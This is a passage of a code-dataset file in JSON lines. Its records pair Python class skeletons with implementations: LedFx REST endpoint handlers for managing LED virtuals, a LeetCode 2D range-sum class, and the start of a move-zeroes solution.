await request.json()\nexcept JSONDecodeError:\n response = {'status': 'failed', 'reason': 'JSON Decoding failed'}\n return web.json_response(data=response, status=400)\nvirtual_segments = data.get('segments')\nif virtual_segments is None:\n response = {'status': 'failed', 'reason': 'Required attribute \"segments\" was not provided'}\n return web.json_response(data=response, status=400)\nold_segments = virtual.segments\ntry:\n virtual.update_segments(virtual_segments)\nexcept (ValueError, vol.MultipleInvalid, vol.Invalid) as msg:\n response = {'status': 'failed', 'payload': {'type': 'error', 'message': str(msg)}}\n virtual.update_segments(old_segments)\n return web.json_response(data=response, status=202)\nfor idx, item in enumerate(self._ledfx.config['virtuals']):\n if item['id'] == virtual.id:\n item['segments'] = virtual.segments\n self._ledfx.config['virtuals'][idx] = item\n break\nsave_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\nresponse = {'status': 'success', 'segments': virtual.segments}\nreturn web.json_response(data=response, status=200)", "virtual = self._ledfx.virtuals.get(virtual_id)\nif virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\nvirtual.clear_effect()\ndevice_id = virtual.is_device\ndevice = self._ledfx.devices.get(device_id)\nif device is not None:\n await device.remove_from_virtuals()\n self._ledfx.devices.destroy(device_id)\n self._ledfx.config['devices'] = [_device for _device in self._ledfx.config['devices'] if _device['id'] != device_id]\nledfx_scenes = self._ledfx.config['scenes'].copy()\nfor scene_id, scene_config in ledfx_scenes.items():\n self._ledfx.config['scenes'][scene_id]['virtuals'] = {_virtual_id: effect for _virtual_id, effect in scene_config['virtuals'].items() if _virtual_id != virtual_id}\nself._ledfx.virtuals.destroy(virtual_id)\nself._ledfx.config['virtuals'] = [virtual for virtual in self._ledfx.config['virtuals'] if virtual['id'] != virtual_id]\nsave_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\nresponse = {'status': 'success'}\nreturn web.json_response(data=response, status=200)"], "bodies_text": "<|body_start_0|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n response = {'status': 'success'}\n response[virtual.id] = {'config': virtual.config, 'id': virtual.id, 'is_device': virtual.is_device, 'auto_generated': virtual.auto_generated, 'segments': virtual.segments, 'pixel_count': virtual.pixel_count, 'active': virtual.active, 'effect': {}}\n if virtual.active_effect:\n effect_response = {}\n effect_response['config'] = virtual.active_effect.config\n effect_response['name'] = virtual.active_effect.name\n effect_response['type'] = virtual.active_effect.type\n response[virtual.id]['effect'] = effect_response\n return web.json_response(data=response, status=200)\n<|end_body_0|>\n\n<|body_start_1|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n try:\n data = await request.json()\n except JSONDecodeError:\n response = {'status': 'failed', 'reason': 'JSON Decoding failed'}\n return web.json_response(data=response, status=400)\n active = data.get('active')\n if active is None:\n response = {'status': 'failed', 'reason': 'Required attribute \"active\" was not provided'}\n return web.json_response(data=response, status=400)\n try:\n virtual.active = active\n except ValueError as msg:\n response = {'status': 'failed', 'payload': {'type': 'warning', 'reason': str(msg)}}\n return web.json_response(data=response, status=202)\n for idx, item in enumerate(self._ledfx.config['virtuals']):\n if item['id'] == virtual.id:\n item['active'] = virtual.active\n self._ledfx.config['virtuals'][idx] = item\n break\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success', 'active': virtual.active}\n return web.json_response(data=response, status=200)\n<|end_body_1|>\n\n<|body_start_2|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n try:\n data = await request.json()\n except JSONDecodeError:\n response = {'status': 'failed', 'reason': 'JSON Decoding failed'}\n return web.json_response(data=response, status=400)\n virtual_segments = data.get('segments')\n if virtual_segments is None:\n response = {'status': 'failed', 'reason': 'Required attribute \"segments\" was not provided'}\n return web.json_response(data=response, status=400)\n old_segments = virtual.segments\n try:\n virtual.update_segments(virtual_segments)\n except (ValueError, vol.MultipleInvalid, vol.Invalid) as msg:\n response = {'status': 'failed', 'payload': {'type': 'error', 'message': str(msg)}}\n virtual.update_segments(old_segments)\n return web.json_response(data=response, status=202)\n for idx, item in enumerate(self._ledfx.config['virtuals']):\n if item['id'] == virtual.id:\n item['segments'] = virtual.segments\n self._ledfx.config['virtuals'][idx] = item\n break\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success', 'segments': virtual.segments}\n return web.json_response(data=response, status=200)\n<|end_body_2|>\n\n<|body_start_3|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n virtual.clear_effect()\n device_id = virtual.is_device\n device = self._ledfx.devices.get(device_id)\n if device is not None:\n await device.remove_from_virtuals()\n self._ledfx.devices.destroy(device_id)\n self._ledfx.config['devices'] = [_device for _device in self._ledfx.config['devices'] if _device['id'] != device_id]\n ledfx_scenes = self._ledfx.config['scenes'].copy()\n for scene_id, scene_config in ledfx_scenes.items():\n self._ledfx.config['scenes'][scene_id]['virtuals'] = {_virtual_id: effect for _virtual_id, effect in scene_config['virtuals'].items() if _virtual_id != virtual_id}\n self._ledfx.virtuals.destroy(virtual_id)\n self._ledfx.config['virtuals'] = [virtual for virtual in self._ledfx.config['virtuals'] if virtual['id'] != virtual_id]\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success'}\n return web.json_response(data=response, status=200)\n<|end_body_3|>\n", "class_docstring": "REST end-point for querying and managing virtuals", "class_name": "VirtualEndpoint", "detected_licenses": ["LGPL-2.0-or-later", "LicenseRef-scancode-warranty-disclaimer", "GPL-3.0-only", "GPL-3.0-or-later", "LGPL-2.1-or-later", "GPL-1.0-or-later"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass VirtualEndpoint:\n \"\"\"REST end-point for querying and managing virtuals\"\"\"\n\n async def get(self, virtual_id) -> web.Response:\n \"\"\"Get a virtual's full config\"\"\"\n <|body_0|>\n\n async def put(self, virtual_id, request) -> web.Response:\n \"\"\"Set a virtual to active or inactive\"\"\"\n <|body_1|>\n\n async def post(self, virtual_id, request) -> web.Response:\n \"\"\"Update a virtual's segments configuration\"\"\"\n <|body_2|>\n\n async def delete(self, virtual_id) -> web.Response:\n \"\"\"Remove a virtual with this virtual id Handles deleting the device if the virtual is dedicated to a device Removes references to this virtual in any scenes\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n response = {'status': 'success'}\n response[virtual.id] = {'config': virtual.config, 'id': virtual.id, 'is_device': virtual.is_device, 'auto_generated': virtual.auto_generated, 'segments': virtual.segments, 'pixel_count': virtual.pixel_count, 'active': virtual.active, 'effect': {}}\n if virtual.active_effect:\n effect_response = {}\n effect_response['config'] = virtual.active_effect.config\n effect_response['name'] = virtual.active_effect.name\n effect_response['type'] = virtual.active_effect.type\n response[virtual.id]['effect'] = effect_response\n return web.json_response(data=response, status=200)\n<|end_body_0|>\n\n<|body_start_1|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n try:\n data = await request.json()\n except JSONDecodeError:\n response = {'status': 'failed', 'reason': 'JSON Decoding failed'}\n return web.json_response(data=response, status=400)\n active = data.get('active')\n if active is None:\n response = {'status': 'failed', 'reason': 'Required attribute \"active\" was not provided'}\n return web.json_response(data=response, status=400)\n try:\n virtual.active = active\n except ValueError as msg:\n response = {'status': 'failed', 'payload': {'type': 'warning', 'reason': str(msg)}}\n return web.json_response(data=response, status=202)\n for idx, item in enumerate(self._ledfx.config['virtuals']):\n if item['id'] == virtual.id:\n item['active'] = virtual.active\n self._ledfx.config['virtuals'][idx] = item\n break\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success', 'active': virtual.active}\n return web.json_response(data=response, status=200)\n<|end_body_1|>\n\n<|body_start_2|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n try:\n data = await request.json()\n except JSONDecodeError:\n response = {'status': 'failed', 'reason': 'JSON Decoding failed'}\n return web.json_response(data=response, status=400)\n virtual_segments = data.get('segments')\n if virtual_segments is None:\n response = {'status': 'failed', 'reason': 'Required attribute \"segments\" was not provided'}\n return web.json_response(data=response, status=400)\n old_segments = virtual.segments\n try:\n virtual.update_segments(virtual_segments)\n except (ValueError, vol.MultipleInvalid, vol.Invalid) as msg:\n response = {'status': 'failed', 'payload': {'type': 'error', 'message': str(msg)}}\n virtual.update_segments(old_segments)\n return web.json_response(data=response, status=202)\n for idx, item in enumerate(self._ledfx.config['virtuals']):\n if item['id'] == virtual.id:\n item['segments'] = virtual.segments\n self._ledfx.config['virtuals'][idx] = item\n break\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success', 'segments': virtual.segments}\n return web.json_response(data=response, status=200)\n<|end_body_2|>\n\n<|body_start_3|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n virtual.clear_effect()\n device_id = virtual.is_device\n device = self._ledfx.devices.get(device_id)\n if device is not None:\n await device.remove_from_virtuals()\n self._ledfx.devices.destroy(device_id)\n self._ledfx.config['devices'] = [_device for _device in self._ledfx.config['devices'] if _device['id'] != device_id]\n ledfx_scenes = self._ledfx.config['scenes'].copy()\n for scene_id, scene_config in ledfx_scenes.items():\n self._ledfx.config['scenes'][scene_id]['virtuals'] = {_virtual_id: effect for _virtual_id, effect in scene_config['virtuals'].items() if _virtual_id != virtual_id}\n self._ledfx.virtuals.destroy(virtual_id)\n self._ledfx.config['virtuals'] = [virtual for virtual in self._ledfx.config['virtuals'] if virtual['id'] != virtual_id]\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success'}\n return web.json_response(data=response, status=200)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000226", "length_bytes": 7327, "license_type": "permissive", "methods": [{"docstring": "Get a virtual's full config", "name": "get", "signature": "async def get(self, virtual_id) -> web.Response"}, {"docstring": "Set a virtual to active or inactive", "name": "put", "signature": "async def put(self, virtual_id, request) -> web.Response"}, {"docstring": "Update a virtual's segments configuration", "name": "post", "signature": "async def post(self, virtual_id, request) -> web.Response"}, {"docstring": "Remove a virtual with this virtual id Handles deleting the device if the virtual is dedicated to a device Removes references to this virtual in any scenes", "name": "delete", "signature": "async def delete(self, virtual_id) -> web.Response"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_000266", "prompt": "Implement the Python class `VirtualEndpoint` described below.\n\nClass description:\nREST end-point for querying and managing virtuals\n\nMethod signatures and docstrings:\n- async def get(self, virtual_id) -> web.Response: Get a virtual's full config\n- async def put(self, virtual_id, request) -> web.Response: Set a virtual to active or inactive\n- async def post(self, virtual_id, request) -> web.Response: Update a virtual's segments configuration\n- async def delete(self, virtual_id) -> web.Response: Remove a virtual with this virtual id Handles deleting the device if the virtual is dedicated to a device Removes references to this virtual in any scenes", "prompted_full_text": "Implement the Python class `VirtualEndpoint` described below.\n\nClass description:\nREST end-point for querying and managing virtuals\n\nMethod signatures and docstrings:\n- async def get(self, virtual_id) -> web.Response: Get a virtual's full config\n- async def put(self, virtual_id, request) -> web.Response: Set a virtual to active or inactive\n- async def post(self, virtual_id, request) -> web.Response: Update a virtual's segments configuration\n- async def delete(self, virtual_id) -> web.Response: Remove a virtual with this virtual id Handles deleting the device if the virtual is dedicated to a device Removes references to this virtual in any scenes\n\n<|skeleton|>\nclass VirtualEndpoint:\n \"\"\"REST end-point for querying and managing virtuals\"\"\"\n\n async def get(self, virtual_id) -> web.Response:\n \"\"\"Get a virtual's full config\"\"\"\n <|body_0|>\n\n async def put(self, virtual_id, request) -> web.Response:\n \"\"\"Set a virtual to active or inactive\"\"\"\n <|body_1|>\n\n async def post(self, virtual_id, request) -> web.Response:\n \"\"\"Update a virtual's segments configuration\"\"\"\n <|body_2|>\n\n async def delete(self, virtual_id) -> web.Response:\n \"\"\"Remove a virtual with this virtual id Handles deleting the device if the virtual is dedicated to a device Removes references to this virtual in any scenes\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n response = {'status': 'success'}\n response[virtual.id] = {'config': virtual.config, 'id': virtual.id, 'is_device': virtual.is_device, 'auto_generated': virtual.auto_generated, 'segments': virtual.segments, 'pixel_count': virtual.pixel_count, 'active': virtual.active, 'effect': {}}\n if virtual.active_effect:\n effect_response = {}\n effect_response['config'] = virtual.active_effect.config\n effect_response['name'] = virtual.active_effect.name\n effect_response['type'] = virtual.active_effect.type\n response[virtual.id]['effect'] = effect_response\n return web.json_response(data=response, status=200)\n<|end_body_0|>\n\n<|body_start_1|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n try:\n data = await request.json()\n except JSONDecodeError:\n response = {'status': 'failed', 'reason': 'JSON Decoding failed'}\n return web.json_response(data=response, status=400)\n active = data.get('active')\n if active is None:\n response = {'status': 'failed', 'reason': 'Required attribute \"active\" was not provided'}\n return web.json_response(data=response, status=400)\n try:\n virtual.active = active\n except ValueError as msg:\n response = {'status': 'failed', 'payload': {'type': 'warning', 'reason': str(msg)}}\n return web.json_response(data=response, status=202)\n for idx, item in enumerate(self._ledfx.config['virtuals']):\n if item['id'] == virtual.id:\n item['active'] = virtual.active\n self._ledfx.config['virtuals'][idx] = item\n break\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success', 'active': virtual.active}\n return web.json_response(data=response, status=200)\n<|end_body_1|>\n\n<|body_start_2|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n try:\n data = await request.json()\n except JSONDecodeError:\n response = {'status': 'failed', 'reason': 'JSON Decoding failed'}\n return web.json_response(data=response, status=400)\n virtual_segments = data.get('segments')\n if virtual_segments is None:\n response = {'status': 'failed', 'reason': 'Required attribute \"segments\" was not provided'}\n return web.json_response(data=response, status=400)\n old_segments = virtual.segments\n try:\n virtual.update_segments(virtual_segments)\n except (ValueError, vol.MultipleInvalid, vol.Invalid) as msg:\n response = {'status': 'failed', 'payload': {'type': 'error', 'message': str(msg)}}\n virtual.update_segments(old_segments)\n return web.json_response(data=response, status=202)\n for idx, item in enumerate(self._ledfx.config['virtuals']):\n if item['id'] == virtual.id:\n item['segments'] = virtual.segments\n self._ledfx.config['virtuals'][idx] = item\n break\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success', 'segments': virtual.segments}\n return web.json_response(data=response, status=200)\n<|end_body_2|>\n\n<|body_start_3|>\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n virtual.clear_effect()\n device_id = virtual.is_device\n device = self._ledfx.devices.get(device_id)\n if device is not None:\n await device.remove_from_virtuals()\n self._ledfx.devices.destroy(device_id)\n self._ledfx.config['devices'] = [_device for _device in self._ledfx.config['devices'] if _device['id'] != device_id]\n ledfx_scenes = self._ledfx.config['scenes'].copy()\n for scene_id, scene_config in ledfx_scenes.items():\n self._ledfx.config['scenes'][scene_id]['virtuals'] = {_virtual_id: effect for _virtual_id, effect in scene_config['virtuals'].items() if _virtual_id != virtual_id}\n self._ledfx.virtuals.destroy(virtual_id)\n self._ledfx.config['virtuals'] = [virtual for virtual in self._ledfx.config['virtuals'] if virtual['id'] != virtual_id]\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success'}\n return web.json_response(data=response, status=200)\n<|end_body_3|>\n", "revision_id": "3146ba9e9d10a2d01cdd4cb15ea37fc0c7bd020f", "skeleton": "<|skeleton|>\nclass VirtualEndpoint:\n \"\"\"REST end-point for querying and managing virtuals\"\"\"\n\n async def get(self, virtual_id) -> web.Response:\n \"\"\"Get a virtual's full config\"\"\"\n <|body_0|>\n\n async def put(self, virtual_id, request) -> web.Response:\n \"\"\"Set a virtual to active or inactive\"\"\"\n <|body_1|>\n\n async def post(self, virtual_id, request) -> web.Response:\n \"\"\"Update a virtual's segments configuration\"\"\"\n <|body_2|>\n\n async def delete(self, virtual_id) -> web.Response:\n \"\"\"Remove a virtual with this virtual id Handles deleting the device if the virtual is dedicated to a device Removes references to this virtual in any scenes\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class VirtualEndpoint:\n \"\"\"REST end-point for querying and managing virtuals\"\"\"\n\n async def get(self, virtual_id) -> web.Response:\n \"\"\"Get a virtual's full config\"\"\"\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n response = {'status': 'success'}\n response[virtual.id] = {'config': virtual.config, 'id': virtual.id, 'is_device': virtual.is_device, 'auto_generated': virtual.auto_generated, 'segments': virtual.segments, 'pixel_count': virtual.pixel_count, 'active': virtual.active, 'effect': {}}\n if virtual.active_effect:\n effect_response = {}\n effect_response['config'] = virtual.active_effect.config\n effect_response['name'] = virtual.active_effect.name\n effect_response['type'] = virtual.active_effect.type\n response[virtual.id]['effect'] = effect_response\n return web.json_response(data=response, status=200)\n\n async def put(self, virtual_id, request) -> web.Response:\n \"\"\"Set a virtual to active or inactive\"\"\"\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n try:\n data = await request.json()\n except JSONDecodeError:\n response = {'status': 'failed', 'reason': 'JSON Decoding failed'}\n return web.json_response(data=response, status=400)\n active = data.get('active')\n if active is None:\n response = {'status': 'failed', 'reason': 'Required attribute \"active\" was not provided'}\n return web.json_response(data=response, status=400)\n try:\n virtual.active = active\n except ValueError as msg:\n response = {'status': 'failed', 'payload': {'type': 'warning', 'reason': str(msg)}}\n return web.json_response(data=response, status=202)\n for idx, item in enumerate(self._ledfx.config['virtuals']):\n if item['id'] == virtual.id:\n item['active'] = virtual.active\n self._ledfx.config['virtuals'][idx] = item\n break\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success', 'active': virtual.active}\n return web.json_response(data=response, status=200)\n\n async def post(self, virtual_id, request) -> web.Response:\n \"\"\"Update a virtual's segments configuration\"\"\"\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n try:\n data = await request.json()\n except JSONDecodeError:\n response = {'status': 'failed', 'reason': 'JSON Decoding failed'}\n return web.json_response(data=response, status=400)\n virtual_segments = data.get('segments')\n if virtual_segments is None:\n response = {'status': 'failed', 'reason': 'Required attribute \"segments\" was not provided'}\n return web.json_response(data=response, status=400)\n old_segments = virtual.segments\n try:\n virtual.update_segments(virtual_segments)\n except (ValueError, vol.MultipleInvalid, vol.Invalid) as msg:\n response = {'status': 'failed', 'payload': {'type': 'error', 'message': str(msg)}}\n virtual.update_segments(old_segments)\n return web.json_response(data=response, status=202)\n for idx, item in enumerate(self._ledfx.config['virtuals']):\n if item['id'] == virtual.id:\n item['segments'] = virtual.segments\n self._ledfx.config['virtuals'][idx] = item\n break\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success', 'segments': virtual.segments}\n return web.json_response(data=response, status=200)\n\n async def delete(self, virtual_id) -> web.Response:\n \"\"\"Remove a virtual with this virtual id Handles deleting the device if the virtual is dedicated to a device Removes references to this virtual in any scenes\"\"\"\n virtual = self._ledfx.virtuals.get(virtual_id)\n if virtual is None:\n response = {'status': 'failed', 'reason': f'Virtual with ID {virtual_id} not found'}\n return web.json_response(data=response, status=404)\n virtual.clear_effect()\n device_id = virtual.is_device\n device = self._ledfx.devices.get(device_id)\n if device is not None:\n await device.remove_from_virtuals()\n self._ledfx.devices.destroy(device_id)\n self._ledfx.config['devices'] = [_device for _device in self._ledfx.config['devices'] if _device['id'] != device_id]\n ledfx_scenes = self._ledfx.config['scenes'].copy()\n for scene_id, scene_config in ledfx_scenes.items():\n self._ledfx.config['scenes'][scene_id]['virtuals'] = {_virtual_id: effect for _virtual_id, effect in scene_config['virtuals'].items() if _virtual_id != virtual_id}\n self._ledfx.virtuals.destroy(virtual_id)\n self._ledfx.config['virtuals'] = [virtual for virtual in self._ledfx.config['virtuals'] if virtual['id'] != virtual_id]\n save_config(config=self._ledfx.config, config_dir=self._ledfx.config_dir)\n response = {'status': 'success'}\n return web.json_response(data=response, status=200)\n", "source": "the_stack_v2_python_sparse", "source_path": "ledfx/api/virtual.py", "source_repo": "THATDONFC/LedFx", "split": "test", "star_events_count": 0} {"blob_id": "c0bca80377e325119974dd30892b2c8113825103", "bodies": ["if not matrix:\n return None\nself.lsum = []\nfor i in range(len(matrix)):\n self.lsum.append([matrix[i][0]])\n for j in range(1, len(matrix[0])):\n self.lsum[i].append(self.lsum[i][-1] + matrix[i][j])\nself.lusum = [self.lsum[0]]\nfor i in range(1, len(matrix)):\n self.lusum.append([])\n for j in range(len(matrix[0])):\n self.lusum[i].append(self.lsum[i][j] + self.lusum[i - 1][j])", "ans = 0\nans += self.lusum[row2][col2]\nif row1 > 0:\n ans -= self.lusum[row1 - 1][col2]\nif col1 > 0:\n ans -= self.lusum[row2][col1 - 1]\nif row1 > 0 and col1 > 0:\n ans += self.lusum[row1 - 1][col1 - 1]\nreturn ans"], "bodies_text": "<|body_start_0|>\n if not matrix:\n return None\n self.lsum = []\n for i in range(len(matrix)):\n self.lsum.append([matrix[i][0]])\n for j in range(1, len(matrix[0])):\n self.lsum[i].append(self.lsum[i][-1] + matrix[i][j])\n self.lusum = [self.lsum[0]]\n for i in range(1, len(matrix)):\n self.lusum.append([])\n for j in range(len(matrix[0])):\n self.lusum[i].append(self.lsum[i][j] + self.lusum[i - 1][j])\n<|end_body_0|>\n\n<|body_start_1|>\n ans = 0\n ans += self.lusum[row2][col2]\n if row1 > 0:\n ans -= self.lusum[row1 - 1][col2]\n if col1 > 0:\n ans -= self.lusum[row2][col1 - 1]\n if row1 > 0 and col1 > 0:\n ans += self.lusum[row1 - 1][col1 - 1]\n return ans\n<|end_body_1|>\n", "class_docstring": "", "class_name": "NumMatrix", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass NumMatrix:\n\n def __init__(self, matrix):\n \"\"\":type matrix: List[List[int]]\"\"\"\n <|body_0|>\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\":type row1: int :type col1: int :type row2: int :type col2: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not matrix:\n return None\n self.lsum = []\n for i in range(len(matrix)):\n self.lsum.append([matrix[i][0]])\n for j in range(1, len(matrix[0])):\n self.lsum[i].append(self.lsum[i][-1] + matrix[i][j])\n self.lusum = [self.lsum[0]]\n for i in range(1, len(matrix)):\n self.lusum.append([])\n for j in range(len(matrix[0])):\n self.lusum[i].append(self.lsum[i][j] + self.lusum[i - 1][j])\n<|end_body_0|>\n\n<|body_start_1|>\n ans = 0\n ans += self.lusum[row2][col2]\n if row1 > 0:\n ans -= self.lusum[row1 - 1][col2]\n if col1 > 0:\n ans -= self.lusum[row2][col1 - 1]\n if row1 > 0 and col1 > 0:\n ans += self.lusum[row1 - 1][col1 - 1]\n return ans\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000227", "length_bytes": 1226, "license_type": "no_license", "methods": [{"docstring": ":type matrix: List[List[int]]", "name": "__init__", "signature": "def __init__(self, matrix)"}, {"docstring": ":type row1: int :type col1: int :type row2: int :type col2: int :rtype: int", "name": "sumRegion", "signature": "def sumRegion(self, row1, col1, row2, col2)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004155", "prompt": "Implement the Python class `NumMatrix` described below.\n\nClass description:\nImplement the NumMatrix class.\n\nMethod signatures and docstrings:\n- def __init__(self, matrix): :type matrix: List[List[int]]\n- def sumRegion(self, row1, col1, row2, col2): :type row1: int :type col1: int :type row2: int :type col2: int :rtype: int", "prompted_full_text": "Implement the Python class `NumMatrix` described below.\n\nClass description:\nImplement the NumMatrix class.\n\nMethod signatures and docstrings:\n- def __init__(self, matrix): :type matrix: List[List[int]]\n- def sumRegion(self, row1, col1, row2, col2): :type row1: int :type col1: int :type row2: int :type col2: int :rtype: int\n\n<|skeleton|>\nclass NumMatrix:\n\n def __init__(self, matrix):\n \"\"\":type matrix: List[List[int]]\"\"\"\n <|body_0|>\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\":type row1: int :type col1: int :type row2: int :type col2: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not matrix:\n return None\n self.lsum = []\n for i in range(len(matrix)):\n self.lsum.append([matrix[i][0]])\n for j in range(1, len(matrix[0])):\n self.lsum[i].append(self.lsum[i][-1] + matrix[i][j])\n self.lusum = [self.lsum[0]]\n for i in range(1, len(matrix)):\n self.lusum.append([])\n for j in range(len(matrix[0])):\n self.lusum[i].append(self.lsum[i][j] + self.lusum[i - 1][j])\n<|end_body_0|>\n\n<|body_start_1|>\n ans = 0\n ans += self.lusum[row2][col2]\n if row1 > 0:\n ans -= self.lusum[row1 - 1][col2]\n if col1 > 0:\n ans -= self.lusum[row2][col1 - 1]\n if row1 > 0 and col1 > 0:\n ans += self.lusum[row1 - 1][col1 - 1]\n return ans\n<|end_body_1|>\n", "revision_id": "8da15dce9bff72fc8b8aa75cf60bfd58f6754935", "skeleton": "<|skeleton|>\nclass NumMatrix:\n\n def __init__(self, matrix):\n \"\"\":type matrix: List[List[int]]\"\"\"\n <|body_0|>\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\":type row1: int :type col1: int :type row2: int :type col2: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class NumMatrix:\n def __init__(self, matrix):\n \"\"\":type matrix: List[List[int]]\"\"\"\n if not matrix:\n return None\n self.lsum = []\n for i in range(len(matrix)):\n self.lsum.append([matrix[i][0]])\n for j in range(1, len(matrix[0])):\n self.lsum[i].append(self.lsum[i][-1] + matrix[i][j])\n self.lusum = [self.lsum[0]]\n for i in range(1, len(matrix)):\n self.lusum.append([])\n for j in range(len(matrix[0])):\n self.lusum[i].append(self.lsum[i][j] + self.lusum[i - 1][j])\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\":type row1: int :type col1: int :type row2: int :type col2: int :rtype: int\"\"\"\n ans = 0\n ans += self.lusum[row2][col2]\n if row1 > 0:\n ans -= self.lusum[row1 - 1][col2]\n if col1 > 0:\n ans -= self.lusum[row2][col1 - 1]\n if row1 > 0 and col1 > 0:\n ans += self.lusum[row1 - 1][col1 - 1]\n return ans\n", "source": "the_stack_v2_python_sparse", "source_path": "0304/RangeSumQuery.py", "source_repo": "UchihaSean/LeetCode", "split": "test", "star_events_count": 1} {"blob_id": "265946f67b70ea6c96ed04389c31650606dacc63", "bodies": ["l, r, size = (0, 0, len(nums))\nwhile r < size:\n if nums[r] != 0:\n nums[l], nums[r] = (nums[r], nums[l])\n l += 1\n r += 1\nprint(nums)", "size, l = (len(nums), 0)\nfor i in range(0, size):\n if nums[i] != 0:\n nums[l] = nums[i]\n l += 1\nfor i in range(l, size):\n nums[i] = 0"], "bodies_text": "<|body_start_0|>\n l, r, size = (0, 0, len(nums))\n while r < size:\n if nums[r] != 0:\n nums[l], nums[r] = (nums[r], nums[l])\n l += 1\n r += 1\n print(nums)\n<|end_body_0|>\n\n<|body_start_1|>\n size, l = (len(nums), 0)\n for i in range(0, size):\n if nums[i] != 0:\n nums[l] = nums[i]\n l += 1\n for i in range(l, size):\n nums[i] = 0\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def moveZeroes(self, nums: List[int]) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_0|>\n\n def moveZeroes1(self, nums: List[int]) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n l, r, size = (0, 0, len(nums))\n while r < 